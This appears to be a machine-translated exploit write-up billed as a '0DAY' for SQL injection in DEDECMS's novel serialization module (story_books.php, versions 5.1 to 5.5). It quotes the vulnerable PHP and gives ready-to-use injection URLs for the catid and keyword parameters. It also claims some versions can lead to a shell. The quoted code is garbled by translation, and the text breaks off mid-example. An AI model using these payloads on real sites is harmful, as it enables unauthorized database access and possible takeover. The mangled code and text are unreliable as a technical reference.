DEDECMS novel serialization module 0DAY

Author: st0p
Can reprint, but please indicate the source of http://www.st0p.org

Because this hole appears in the DEDECMS novel serialization module, this problem exists as long as DEDECMS selects the novel serialization module during installation, some versions can directly use SHELL if conditions permit.
St0p summarizes the utilization conditions.
Condition 1: When magic_quotes_gpc = Off is set for PHP on the server
Condition 2: The novel serialization module is selected when the target DEDECMS system is installed.

First, let's take a look at DEDECMS 5.1. His novel channel is different from DEDECMS 5.3.1 and dededecms 5.5 because his file is under the member directory and the file is member/story_books.php, the files in DEDECMS 5.3.1 and DEDECMS 5.5 are in the book directory. The files are book/story_books.php.
Because the code inside is similar, let's just look at a story_books.php.

123456789101112131415161718

<? Php......If(!Isset($ Action)) $ Action = ; // Check whether the variable $ action exists. If the variable is not saved, the initial value is used.If(!Isset($ Catid)) $ Catid = 0; // Check whether the variable $ catid exists. If the variable is not saved, the initial value is used.If(!Isset($ Keyword)) $ Keyword = ""; // Check whether the variable $ keyword exists. If the variable is not saved, the initial value is used.If(!Isset($ Orderby)) $ Orderby = 0; // Check whether the variable $ orderby exists. If it is not stored, it is given to the initial value.......If($ Catid! =0) $ Addquery . = "And (B. bcatid =$ CatidOr B. catid =$ Catid)"; // When the variable $ catid is not 0, $ catid is directly given to $ addquery without verification.If($ Keyword! ="") $ Addquery . = "And (B. bookname like %$ Keyword% Or B. author like %$ Keyword% )";// When the variable $ keyword is not empty, $ keyword is directly given to $ addquery without verification.$ Query = "Select B. id, B. catid, B. bookname, B. booktype, B. litpic, B. postnum, B. senddate, b.ischeck, c.id as cid,c.classname From dede_story_books b left join dede_story_catalog c on c.id = b.catid where Memberid ={$ Cmd_ml-> M_ID}And B. id> 0$ Addquery $ Orderby";// The statement is generated.......?>

The above Code shows that, Ga, catid and keyword are not filtered, which causes injection. However, it seems that it is a bit difficult to construct a statement. This is not covered in this article, let's give you a small example. perform the following operations after you log on, register an account, log on, and enter the following address.

DEDECMS 5.1

Test 1: The catid variable. The address is as follows:
Http: // st0p: 88/dedecms51/member/story_books.php? Catid = 10') or ('st0p' = 'st0p

Test 2: keyword variable, address:
Http: // st0p: 88/dedecms51/member/story_books.php? Keyword = st0p % 'or c. classname like' % st0p

DEDECMS 5.31

Test 1: The catid variable. The address is as follows:
Http: // st0p: 88/dedecms53/book/story_books.php? Catid = 10') or ('st0p' = 'st0p

Test 2: keyword variable, address:

Http: // st0p: 88/dedecms53/book/story_books.php? Keyword = st0p % 'or c. classname like' % st0p

DEDECMS 5.5

Test 1: The catid variable. The address is as follows:
Http: // st0p: 88/dedecms55/book/story_books.php? Catid = 10') or ('st0p' = 'st0p

Test 2: keyword variable,